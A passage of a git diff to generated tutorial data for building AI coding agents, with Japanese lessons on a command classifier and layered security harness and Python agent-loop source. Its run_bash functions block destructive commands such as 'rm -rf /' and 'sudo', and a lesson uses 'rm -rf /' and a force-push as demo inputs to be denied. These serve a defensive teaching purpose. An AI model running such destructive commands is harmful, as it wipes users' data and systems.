agents/s14_security_classifier.py\n```\n\n1. `delete the build/ directory` (LLMがmoderateと判定 -> 確認)\n2. `list all python files` (ホワイトリスト -> 許可)\n3. `run git push --force origin main` (正規パターン -> 拒否)\n4. `run pip install numpy` (LLMがmoderateと判定 -> 確認)\n5. `create a new file called test.py` (LLMがsafeと判定 -> 許可)\n" + }, + { + "version": "s17", + "locale": "ja", + "title": "s17: Secure Extension Harness (セキュア拡張ハーネス)", + "content": "# s17: Secure Extension Harness (セキュア拡張ハーネス)\n\n`s02 > s13 > s14 | s15 | s16 > [ s17 ]`\n\n> *\"プロダクションハーネスの核心は機能の多さではなく、各層の責任の明確さにある\"*\n>\n> **Harness 層**: セキュリティパイプライン -- すべての防御層を1つの実行パスに構成。\n\n## 問題\n\ns13-s16はそれぞれスタンドアロンのエージェントとして動作する。本番システムではすべての層が単一の実行パイプライン内で連携する必要がある。\n\n## 解決策\n\n各層は1つの質問にのみ答える:\n\n| 層 | 質問 | 出典 |\n|----|------|------|\n| Hook | \"このアクションを傍受すべきか?\" | s15 |\n| 分類器 | \"このコマンドの意図は何か?\" | s14 |\n| 権限 | \"この意図は許可されるか?\" | s13 |\n| 実行 | \"実行して結果を返す\" | s02 + s16 |\n\n## 動作原理\n\n1. `execute_tool()` がすべてのツール呼び出しに対して5層パイプラインを実行。\n2. 各層は独立 -- どれか1つを削除しても他は動作する。\n3. REPLコマンド: `/security`, `/hooks`, `/mcp`, `/audit`。\n\n## s16からの変更点\n\n| コンポーネント | 変更前 (s13-s16単体) | 変更後 (s17) |\n|---------------|---------------------|-------------|\n| セキュリティパイプライン | 各章が単独で実行 | 統合`execute_tool`パイプライン |\n| 分類器 | 単独実行 | Hook -> Classify -> Permissionフローに組み込み |\n| Hooks | 単独実行 | パイプラインの最初と最後の層 |\n| MCP | 単独実行 | パイプライン実行層の一部 |\n\n## 試してみる\n\n```sh\ncd learn-claude-code\npython agents/s17_secure_extension_harness.py\n```\n\n1. `list all python files` (全層通過 -> 許可)\n2. `run rm -rf /` (分類器が拒否 -> ブロック)\n3. `write a test file and show audit log` (PostToolUseフックが記録 -> `/audit`)\n4. `search for 'PermissionGuard' via MCP` (MCPツールがパイプライン経由で呼ばれる)\n5. `register a hook that blocks all pip commands` (動的フック登録)\n" } ] \ No newline at end of file diff --git a/web/src/data/generated/versions.json b/web/src/data/generated/versions.json index 0af62b7b5..6fb55632f 100644 --- a/web/src/data/generated/versions.json +++ b/web/src/data/generated/versions.json @@ -5,7 +5,7 @@ "filename": "s01_agent_loop.py", "title": "The Agent Loop", "subtitle": "Bash is All You Need", - "loc": 84, + "loc": 95, "tools": [ "bash" ], @@ -19,23 +19,23 @@ { "name": "run_bash", "signature": "def run_bash(command: str)", - "startLine": 53 + "startLine": 65 }, { "name": "agent_loop", "signature": "def agent_loop(messages: list)", - "startLine": 67 + "startLine": 81 } ], "layer": "tools", - "source": "#!/usr/bin/env python3\n\"\"\"\ns01_agent_loop.py - The Agent Loop\n\nThe entire secret of an AI coding agent in one pattern:\n\n while stop_reason == \"tool_use\":\n response = LLM(messages, tools)\n execute tools\n append results\n\n +----------+ +-------+ +---------+\n | User | ---> | LLM | ---> | Tool |\n | prompt | | | | execute |\n +----------+ +---+---+ +----+----+\n ^ |\n | tool_result |\n +---------------+\n (loop continues)\n\nThis is the core loop: feed tool results back to the model\nuntil the model decides to stop. Production agents layer\npolicy, hooks, and lifecycle controls on top.\n\"\"\"\n\nimport os\nimport subprocess\n\nfrom anthropic import Anthropic\nfrom dotenv import load_dotenv\n\nload_dotenv(override=True)\n\nif os.getenv(\"ANTHROPIC_BASE_URL\"):\n os.environ.pop(\"ANTHROPIC_AUTH_TOKEN\", None)\n\nclient = Anthropic(base_url=os.getenv(\"ANTHROPIC_BASE_URL\"))\nMODEL = os.environ[\"MODEL_ID\"]\n\nSYSTEM = f\"You are a coding agent at {os.getcwd()}. Use bash to solve tasks. Act, don't explain.\"\n\nTOOLS = [{\n \"name\": \"bash\",\n \"description\": \"Run a shell command.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\"command\": {\"type\": \"string\"}},\n \"required\": [\"command\"],\n },\n}]\n\n\ndef run_bash(command: str) -> str:\n dangerous = [\"rm -rf /\", \"sudo\", \"shutdown\", \"reboot\", \"> /dev/\"]\n if any(d in command for d in dangerous):\n return \"Error: Dangerous command blocked\"\n try:\n r = subprocess.run(command, shell=True, cwd=os.getcwd(),\n capture_output=True, text=True, timeout=120)\n out = (r.stdout + r.stderr).strip()\n return out[:50000] if out else \"(no output)\"\n except subprocess.TimeoutExpired:\n return \"Error: Timeout (120s)\"\n\n\n# -- The core pattern: a while loop that calls tools until the model stops --\ndef agent_loop(messages: list):\n while True:\n response = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=TOOLS, max_tokens=8000,\n )\n # Append assistant turn\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n # If the model didn't call a tool, we're done\n if response.stop_reason != \"tool_use\":\n return\n # Execute each tool call, collect results\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n print(f\"\\033[33m$ {block.input['command']}\\033[0m\")\n output = run_bash(block.input[\"command\"])\n print(output[:200])\n results.append({\"type\": \"tool_result\", \"tool_use_id\": block.id,\n \"content\": output})\n messages.append({\"role\": \"user\", \"content\": results})\n\n\nif __name__ == \"__main__\":\n history = []\n while True:\n try:\n query = input(\"\\033[36ms01 >> \\033[0m\")\n except (EOFError, KeyboardInterrupt):\n break\n if query.strip().lower() in (\"q\", \"exit\", \"\"):\n break\n history.append({\"role\": \"user\", \"content\": query})\n agent_loop(history)\n response_content = history[-1][\"content\"]\n if isinstance(response_content, list):\n for block in response_content:\n if hasattr(block, \"text\"):\n print(block.text)\n print()\n" + "source": "#!/usr/bin/env python3\n# Harness: the loop -- the model's first connection to the real world.\n\"\"\"\ns01_agent_loop.py - The Agent Loop\n\nThe entire secret of an AI coding agent in one pattern:\n\n while stop_reason == \"tool_use\":\n response = LLM(messages, tools)\n execute tools\n append results\n\n +----------+ +-------+ +---------+\n | User | ---> | LLM | ---> | Tool |\n | prompt | | | | execute |\n +----------+ +---+---+ +----+----+\n ^ |\n | tool_result |\n +---------------+\n (loop continues)\n\nThis is the core loop: feed tool results back to the model\nuntil the model decides to stop. Production agents layer\npolicy, hooks, and lifecycle controls on top.\n\"\"\"\n\nimport os\nimport subprocess\n\ntry:\n import readline\n # #143 UTF-8 backspace fix for macOS libedit\n readline.parse_and_bind('set bind-tty-special-chars off')\n readline.parse_and_bind('set input-meta on')\n readline.parse_and_bind('set output-meta on')\n readline.parse_and_bind('set convert-meta off')\n readline.parse_and_bind('set enable-meta-keybindings on')\nexcept ImportError:\n pass\n\nfrom anthropic import Anthropic\nfrom dotenv import load_dotenv\n\nload_dotenv(override=True)\n\nif os.getenv(\"ANTHROPIC_BASE_URL\"):\n os.environ.pop(\"ANTHROPIC_AUTH_TOKEN\", None)\n\nclient = Anthropic(base_url=os.getenv(\"ANTHROPIC_BASE_URL\"))\nMODEL = os.environ[\"MODEL_ID\"]\n\nSYSTEM = f\"You are a coding agent at {os.getcwd()}. Use bash to solve tasks. Act, don't explain.\"\n\nTOOLS = [{\n \"name\": \"bash\",\n \"description\": \"Run a shell command.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\"command\": {\"type\": \"string\"}},\n \"required\": [\"command\"],\n },\n}]\n\n\ndef run_bash(command: str) -> str:\n dangerous = [\"rm -rf /\", \"sudo\", \"shutdown\", \"reboot\", \"> /dev/\"]\n if any(d in command for d in dangerous):\n return \"Error: Dangerous command blocked\"\n try:\n r = subprocess.run(command, shell=True, cwd=os.getcwd(),\n capture_output=True, text=True, timeout=120)\n out = (r.stdout + r.stderr).strip()\n return out[:50000] if out else \"(no output)\"\n except subprocess.TimeoutExpired:\n return \"Error: Timeout (120s)\"\n except (FileNotFoundError, OSError) as e:\n return f\"Error: {e}\"\n\n\n# -- The core pattern: a while loop that calls tools until the model stops --\ndef agent_loop(messages: list):\n while True:\n response = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=TOOLS, max_tokens=8000,\n )\n # Append assistant turn\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n # If the model didn't call a tool, we're done\n if response.stop_reason != \"tool_use\":\n return\n # Execute each tool call, collect results\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n print(f\"\\033[33m$ {block.input['command']}\\033[0m\")\n output = run_bash(block.input[\"command\"])\n print(output[:200])\n results.append({\"type\": \"tool_result\", \"tool_use_id\": block.id,\n \"content\": output})\n messages.append({\"role\": \"user\", \"content\": results})\n\n\nif __name__ == \"__main__\":\n history = []\n while True:\n try:\n query = input(\"\\033[36ms01 >> \\033[0m\")\n except (EOFError, KeyboardInterrupt):\n break\n if query.strip().lower() in (\"q\", \"exit\", \"\"):\n break\n history.append({\"role\": \"user\", \"content\": query})\n agent_loop(history)\n response_content = history[-1][\"content\"]\n if isinstance(response_content, list):\n for block in response_content:\n if hasattr(block, \"text\"):\n print(block.text)\n print()\n" }, { "id": "s02", "filename": "s02_tool_use.py", "title": "Tools", "subtitle": "One Handler Per Tool", - "loc": 120, + "loc": 121, "tools": [ "bash", "read_file", @@ -54,43 +54,43 @@ { "name": "safe_path", "signature": "def safe_path(p: str)", - "startLine": 40 + "startLine": 41 }, { "name": "run_bash", "signature": "def run_bash(command: str)", - "startLine": 47 + "startLine": 48 }, { "name": "run_read", "signature": "def run_read(path: str, limit: int = None)", - "startLine": 60 + "startLine": 61 }, { "name": "run_write", "signature": "def run_write(path: str, content: str)", - "startLine": 71 + "startLine": 72 }, { "name": "run_edit", "signature": "def run_edit(path: str, old_text: str, new_text: str)", - "startLine": 81 + "startLine": 82 }, { "name": "agent_loop", "signature": "def agent_loop(messages: list)", - "startLine": 113 + "startLine": 114 } ], "layer": "tools", - "source": "#!/usr/bin/env python3\n\"\"\"\ns02_tool_use.py - Tools\n\nThe agent loop from s01 didn't change. We just added tools to the array\nand a dispatch map to route calls.\n\n +----------+ +-------+ +------------------+\n | User | ---> | LLM | ---> | Tool Dispatch |\n | prompt | | | | { |\n +----------+ +---+---+ | bash: run_bash |\n ^ | read: run_read |\n | | write: run_wr |\n +----------+ edit: run_edit |\n tool_result| } |\n +------------------+\n\nKey insight: \"The loop didn't change at all. I just added tools.\"\n\"\"\"\n\nimport os\nimport subprocess\nfrom pathlib import Path\n\nfrom anthropic import Anthropic\nfrom dotenv import load_dotenv\n\nload_dotenv(override=True)\n\nif os.getenv(\"ANTHROPIC_BASE_URL\"):\n os.environ.pop(\"ANTHROPIC_AUTH_TOKEN\", None)\n\nWORKDIR = Path.cwd()\nclient = Anthropic(base_url=os.getenv(\"ANTHROPIC_BASE_URL\"))\nMODEL = os.environ[\"MODEL_ID\"]\n\nSYSTEM = f\"You are a coding agent at {WORKDIR}. Use tools to solve tasks. Act, don't explain.\"\n\n\ndef safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\n\ndef run_bash(command: str) -> str:\n dangerous = [\"rm -rf /\", \"sudo\", \"shutdown\", \"reboot\", \"> /dev/\"]\n if any(d in command for d in dangerous):\n return \"Error: Dangerous command blocked\"\n try:\n r = subprocess.run(command, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=120)\n out = (r.stdout + r.stderr).strip()\n return out[:50000] if out else \"(no output)\"\n except subprocess.TimeoutExpired:\n return \"Error: Timeout (120s)\"\n\n\ndef run_read(path: str, limit: int = None) -> str:\n try:\n text = safe_path(path).read_text()\n lines = text.splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit] + [f\"... ({len(lines) - limit} more lines)\"]\n return \"\\n\".join(lines)[:50000]\n except Exception as e:\n return f\"Error: {e}\"\n\n\ndef run_write(path: str, content: str) -> str:\n try:\n fp = safe_path(path)\n fp.parent.mkdir(parents=True, exist_ok=True)\n fp.write_text(content)\n return f\"Wrote {len(content)} bytes to {path}\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\ndef run_edit(path: str, old_text: str, new_text: str) -> str:\n try:\n fp = safe_path(path)\n content = fp.read_text()\n if old_text not in content:\n return f\"Error: Text not found in {path}\"\n fp.write_text(content.replace(old_text, new_text, 1))\n return f\"Edited {path}\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\n# -- The dispatch map: {tool_name: handler} --\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: run_edit(kw[\"path\"], kw[\"old_text\"], kw[\"new_text\"]),\n}\n\nTOOLS = [\n {\"name\": \"bash\", \"description\": \"Run a shell command.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"read_file\", \"description\": \"Read file contents.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"limit\": {\"type\": \"integer\"}}, \"required\": [\"path\"]}},\n {\"name\": \"write_file\", \"description\": \"Write content to file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}}, \"required\": [\"path\", \"content\"]}},\n {\"name\": \"edit_file\", \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"old_text\": {\"type\": \"string\"}, \"new_text\": {\"type\": \"string\"}}, \"required\": [\"path\", \"old_text\", \"new_text\"]}},\n]\n\n\ndef agent_loop(messages: list):\n while True:\n response = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=TOOLS, max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n return\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n output = handler(**block.input) if handler else f\"Unknown tool: {block.name}\"\n print(f\"> {block.name}: {output[:200]}\")\n results.append({\"type\": \"tool_result\", \"tool_use_id\": block.id, \"content\": output})\n messages.append({\"role\": \"user\", \"content\": results})\n\n\nif __name__ == \"__main__\":\n history = []\n while True:\n try:\n query = input(\"\\033[36ms02 >> \\033[0m\")\n except (EOFError, KeyboardInterrupt):\n break\n if query.strip().lower() in (\"q\", \"exit\", \"\"):\n break\n history.append({\"role\": \"user\", \"content\": query})\n agent_loop(history)\n response_content = history[-1][\"content\"]\n if isinstance(response_content, list):\n for block in response_content:\n if hasattr(block, \"text\"):\n print(block.text)\n print()\n" + "source": "#!/usr/bin/env python3\n# Harness: tool dispatch -- expanding what the model can reach.\n\"\"\"\ns02_tool_use.py - Tools\n\nThe agent loop from s01 didn't change. We just added tools to the array\nand a dispatch map to route calls.\n\n +----------+ +-------+ +------------------+\n | User | ---> | LLM | ---> | Tool Dispatch |\n | prompt | | | | { |\n +----------+ +---+---+ | bash: run_bash |\n ^ | read: run_read |\n | | write: run_wr |\n +----------+ edit: run_edit |\n tool_result| } |\n +------------------+\n\nKey insight: \"The loop didn't change at all. I just added tools.\"\n\"\"\"\n\nimport os\nimport subprocess\nfrom pathlib import Path\n\nfrom anthropic import Anthropic\nfrom dotenv import load_dotenv\n\nload_dotenv(override=True)\n\nif os.getenv(\"ANTHROPIC_BASE_URL\"):\n os.environ.pop(\"ANTHROPIC_AUTH_TOKEN\", None)\n\nWORKDIR = Path.cwd()\nclient = Anthropic(base_url=os.getenv(\"ANTHROPIC_BASE_URL\"))\nMODEL = os.environ[\"MODEL_ID\"]\n\nSYSTEM = f\"You are a coding agent at {WORKDIR}. Use tools to solve tasks. Act, don't explain.\"\n\n\ndef safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\n\ndef run_bash(command: str) -> str:\n dangerous = [\"rm -rf /\", \"sudo\", \"shutdown\", \"reboot\", \"> /dev/\"]\n if any(d in command for d in dangerous):\n return \"Error: Dangerous command blocked\"\n try:\n r = subprocess.run(command, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=120)\n out = (r.stdout + r.stderr).strip()\n return out[:50000] if out else \"(no output)\"\n except subprocess.TimeoutExpired:\n return \"Error: Timeout (120s)\"\n\n\ndef run_read(path: str, limit: int = None) -> str:\n try:\n text = safe_path(path).read_text()\n lines = text.splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit] + [f\"... ({len(lines) - limit} more lines)\"]\n return \"\\n\".join(lines)[:50000]\n except Exception as e:\n return f\"Error: {e}\"\n\n\ndef run_write(path: str, content: str) -> str:\n try:\n fp = safe_path(path)\n fp.parent.mkdir(parents=True, exist_ok=True)\n fp.write_text(content)\n return f\"Wrote {len(content)} bytes to {path}\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\ndef run_edit(path: str, old_text: str, new_text: str) -> str:\n try:\n fp = safe_path(path)\n content = fp.read_text()\n if old_text not in content:\n return f\"Error: Text not found in {path}\"\n fp.write_text(content.replace(old_text, new_text, 1))\n return f\"Edited {path}\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\n# -- The dispatch map: {tool_name: handler} --\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: run_edit(kw[\"path\"], kw[\"old_text\"], kw[\"new_text\"]),\n}\n\nTOOLS = [\n {\"name\": \"bash\", \"description\": \"Run a shell command.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"read_file\", \"description\": \"Read file contents.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"limit\": {\"type\": \"integer\"}}, \"required\": [\"path\"]}},\n {\"name\": \"write_file\", \"description\": \"Write content to file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}}, \"required\": [\"path\", \"content\"]}},\n {\"name\": \"edit_file\", \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"old_text\": {\"type\": \"string\"}, \"new_text\": {\"type\": \"string\"}}, \"required\": [\"path\", \"old_text\", \"new_text\"]}},\n]\n\n\ndef agent_loop(messages: list):\n while True:\n response = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=TOOLS, max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n return\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n output = handler(**block.input) if handler else f\"Unknown tool: {block.name}\"\n print(f\"> {block.name}:\")\n print(output[:200])\n results.append({\"type\": \"tool_result\", \"tool_use_id\": block.id, \"content\": output})\n messages.append({\"role\": \"user\", \"content\": results})\n\n\nif __name__ == \"__main__\":\n history = []\n while True:\n try:\n query = input(\"\\033[36ms02 >> \\033[0m\")\n except (EOFError, KeyboardInterrupt):\n break\n if query.strip().lower() in (\"q\", \"exit\", \"\"):\n break\n history.append({\"role\": \"user\", \"content\": query})\n agent_loop(history)\n response_content = history[-1][\"content\"]\n if isinstance(response_content, list):\n for block in response_content:\n if hasattr(block, \"text\"):\n print(block.text)\n print()\n" }, { "id": "s03", "filename": "s03_todo_write.py", "title": "TodoWrite", "subtitle": "Plan Before You Act", - "loc": 176, + "loc": 177, "tools": [ "bash", "read_file", @@ -106,51 +106,51 @@ "classes": [ { "name": "TodoManager", - "startLine": 51, - "endLine": 87 + "startLine": 52, + "endLine": 88 } ], "functions": [ { "name": "safe_path", "signature": "def safe_path(p: str)", - "startLine": 92 + "startLine": 93 }, { "name": "run_bash", "signature": "def run_bash(command: str)", - "startLine": 98 + "startLine": 99 }, { "name": "run_read", "signature": "def run_read(path: str, limit: int = None)", - "startLine": 110 + "startLine": 111 }, { "name": "run_write", "signature": "def run_write(path: str, content: str)", - "startLine": 119 + "startLine": 120 }, { "name": "run_edit", "signature": "def run_edit(path: str, old_text: str, new_text: str)", - "startLine": 128 + "startLine": 129 }, { "name": "agent_loop", "signature": "def agent_loop(messages: list)", - "startLine": 163 + "startLine": 164 } ], "layer": "planning", - "source": "#!/usr/bin/env python3\n\"\"\"\ns03_todo_write.py - TodoWrite\n\nThe model tracks its own progress via a TodoManager. A nag reminder\nforces it to keep updating when it forgets.\n\n +----------+ +-------+ +---------+\n | User | ---> | LLM | ---> | Tools |\n | prompt | | | | + todo |\n +----------+ +---+---+ +----+----+\n ^ |\n | tool_result |\n +---------------+\n |\n +-----------+-----------+\n | TodoManager state |\n | [ ] task A |\n | [>] task B <- doing |\n | [x] task C |\n +-----------------------+\n |\n if rounds_since_todo >= 3:\n inject \n\nKey insight: \"The agent can track its own progress -- and I can see it.\"\n\"\"\"\n\nimport os\nimport subprocess\nfrom pathlib import Path\n\nfrom anthropic import Anthropic\nfrom dotenv import load_dotenv\n\nload_dotenv(override=True)\n\nif os.getenv(\"ANTHROPIC_BASE_URL\"):\n os.environ.pop(\"ANTHROPIC_AUTH_TOKEN\", None)\n\nWORKDIR = Path.cwd()\nclient = Anthropic(base_url=os.getenv(\"ANTHROPIC_BASE_URL\"))\nMODEL = os.environ[\"MODEL_ID\"]\n\nSYSTEM = f\"\"\"You are a coding agent at {WORKDIR}.\nUse the todo tool to plan multi-step tasks. Mark in_progress before starting, completed when done.\nPrefer tools over prose.\"\"\"\n\n\n# -- TodoManager: structured state the LLM writes to --\nclass TodoManager:\n def __init__(self):\n self.items = []\n\n def update(self, items: list) -> str:\n if len(items) > 20:\n raise ValueError(\"Max 20 todos allowed\")\n validated = []\n in_progress_count = 0\n for i, item in enumerate(items):\n text = str(item.get(\"text\", \"\")).strip()\n status = str(item.get(\"status\", \"pending\")).lower()\n item_id = str(item.get(\"id\", str(i + 1)))\n if not text:\n raise ValueError(f\"Item {item_id}: text required\")\n if status not in (\"pending\", \"in_progress\", \"completed\"):\n raise ValueError(f\"Item {item_id}: invalid status '{status}'\")\n if status == \"in_progress\":\n in_progress_count += 1\n validated.append({\"id\": item_id, \"text\": text, \"status\": status})\n if in_progress_count > 1:\n raise ValueError(\"Only one task can be in_progress at a time\")\n self.items = validated\n return self.render()\n\n def render(self) -> str:\n if not self.items:\n return \"No todos.\"\n lines = []\n for item in self.items:\n marker = {\"pending\": \"[ ]\", \"in_progress\": \"[>]\", \"completed\": \"[x]\"}[item[\"status\"]]\n lines.append(f\"{marker} #{item['id']}: {item['text']}\")\n done = sum(1 for t in self.items if t[\"status\"] == \"completed\")\n lines.append(f\"\\n({done}/{len(self.items)} completed)\")\n return \"\\n\".join(lines)\n\n\nTODO = TodoManager()\n\n\n# -- Tool implementations --\ndef safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\ndef run_bash(command: str) -> str:\n dangerous = [\"rm -rf /\", \"sudo\", \"shutdown\", \"reboot\", \"> /dev/\"]\n if any(d in command for d in dangerous):\n return \"Error: Dangerous command blocked\"\n try:\n r = subprocess.run(command, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=120)\n out = (r.stdout + r.stderr).strip()\n return out[:50000] if out else \"(no output)\"\n except subprocess.TimeoutExpired:\n return \"Error: Timeout (120s)\"\n\ndef run_read(path: str, limit: int = None) -> str:\n try:\n lines = safe_path(path).read_text().splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit] + [f\"... ({len(lines) - limit} more)\"]\n return \"\\n\".join(lines)[:50000]\n except Exception as e:\n return f\"Error: {e}\"\n\ndef run_write(path: str, content: str) -> str:\n try:\n fp = safe_path(path)\n fp.parent.mkdir(parents=True, exist_ok=True)\n fp.write_text(content)\n return f\"Wrote {len(content)} bytes\"\n except Exception as e:\n return f\"Error: {e}\"\n\ndef run_edit(path: str, old_text: str, new_text: str) -> str:\n try:\n fp = safe_path(path)\n content = fp.read_text()\n if old_text not in content:\n return f\"Error: Text not found in {path}\"\n fp.write_text(content.replace(old_text, new_text, 1))\n return f\"Edited {path}\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: run_edit(kw[\"path\"], kw[\"old_text\"], kw[\"new_text\"]),\n \"todo\": lambda **kw: TODO.update(kw[\"items\"]),\n}\n\nTOOLS = [\n {\"name\": \"bash\", \"description\": \"Run a shell command.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"read_file\", \"description\": \"Read file contents.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"limit\": {\"type\": \"integer\"}}, \"required\": [\"path\"]}},\n {\"name\": \"write_file\", \"description\": \"Write content to file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}}, \"required\": [\"path\", \"content\"]}},\n {\"name\": \"edit_file\", \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"old_text\": {\"type\": \"string\"}, \"new_text\": {\"type\": \"string\"}}, \"required\": [\"path\", \"old_text\", \"new_text\"]}},\n {\"name\": \"todo\", \"description\": \"Update task list. Track progress on multi-step tasks.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"items\": {\"type\": \"array\", \"items\": {\"type\": \"object\", \"properties\": {\"id\": {\"type\": \"string\"}, \"text\": {\"type\": \"string\"}, \"status\": {\"type\": \"string\", \"enum\": [\"pending\", \"in_progress\", \"completed\"]}}, \"required\": [\"id\", \"text\", \"status\"]}}}, \"required\": [\"items\"]}},\n]\n\n\n# -- Agent loop with nag reminder injection --\ndef agent_loop(messages: list):\n rounds_since_todo = 0\n while True:\n # Nag reminder is injected below, alongside tool results\n response = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=TOOLS, max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n return\n results = []\n used_todo = False\n for block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n try:\n output = handler(**block.input) if handler else f\"Unknown tool: {block.name}\"\n except Exception as e:\n output = f\"Error: {e}\"\n print(f\"> {block.name}: {str(output)[:200]}\")\n results.append({\"type\": \"tool_result\", \"tool_use_id\": block.id, \"content\": str(output)})\n if block.name == \"todo\":\n used_todo = True\n rounds_since_todo = 0 if used_todo else rounds_since_todo + 1\n if rounds_since_todo >= 3:\n results.insert(0, {\"type\": \"text\", \"text\": \"Update your todos.\"})\n messages.append({\"role\": \"user\", \"content\": results})\n\n\nif __name__ == \"__main__\":\n history = []\n while True:\n try:\n query = input(\"\\033[36ms03 >> \\033[0m\")\n except (EOFError, KeyboardInterrupt):\n break\n if query.strip().lower() in (\"q\", \"exit\", \"\"):\n break\n history.append({\"role\": \"user\", \"content\": query})\n agent_loop(history)\n response_content = history[-1][\"content\"]\n if isinstance(response_content, list):\n for block in response_content:\n if hasattr(block, \"text\"):\n print(block.text)\n print()\n" + "source": "#!/usr/bin/env python3\n# Harness: planning -- keeping the model on course without scripting the route.\n\"\"\"\ns03_todo_write.py - TodoWrite\n\nThe model tracks its own progress via a TodoManager. A nag reminder\nforces it to keep updating when it forgets.\n\n +----------+ +-------+ +---------+\n | User | ---> | LLM | ---> | Tools |\n | prompt | | | | + todo |\n +----------+ +---+---+ +----+----+\n ^ |\n | tool_result |\n +---------------+\n |\n +-----------+-----------+\n | TodoManager state |\n | [ ] task A |\n | [>] task B <- doing |\n | [x] task C |\n +-----------------------+\n |\n if rounds_since_todo >= 3:\n inject \n\nKey insight: \"The agent can track its own progress -- and I can see it.\"\n\"\"\"\n\nimport os\nimport subprocess\nfrom pathlib import Path\n\nfrom anthropic import Anthropic\nfrom dotenv import load_dotenv\n\nload_dotenv(override=True)\n\nif os.getenv(\"ANTHROPIC_BASE_URL\"):\n os.environ.pop(\"ANTHROPIC_AUTH_TOKEN\", None)\n\nWORKDIR = Path.cwd()\nclient = Anthropic(base_url=os.getenv(\"ANTHROPIC_BASE_URL\"))\nMODEL = os.environ[\"MODEL_ID\"]\n\nSYSTEM = f\"\"\"You are a coding agent at {WORKDIR}.\nUse the todo tool to plan multi-step tasks. Mark in_progress before starting, completed when done.\nPrefer tools over prose.\"\"\"\n\n\n# -- TodoManager: structured state the LLM writes to --\nclass TodoManager:\n def __init__(self):\n self.items = []\n\n def update(self, items: list) -> str:\n if len(items) > 20:\n raise ValueError(\"Max 20 todos allowed\")\n validated = []\n in_progress_count = 0\n for i, item in enumerate(items):\n text = str(item.get(\"text\", \"\")).strip()\n status = str(item.get(\"status\", \"pending\")).lower()\n item_id = str(item.get(\"id\", str(i + 1)))\n if not text:\n raise ValueError(f\"Item {item_id}: text required\")\n if status not in (\"pending\", \"in_progress\", \"completed\"):\n 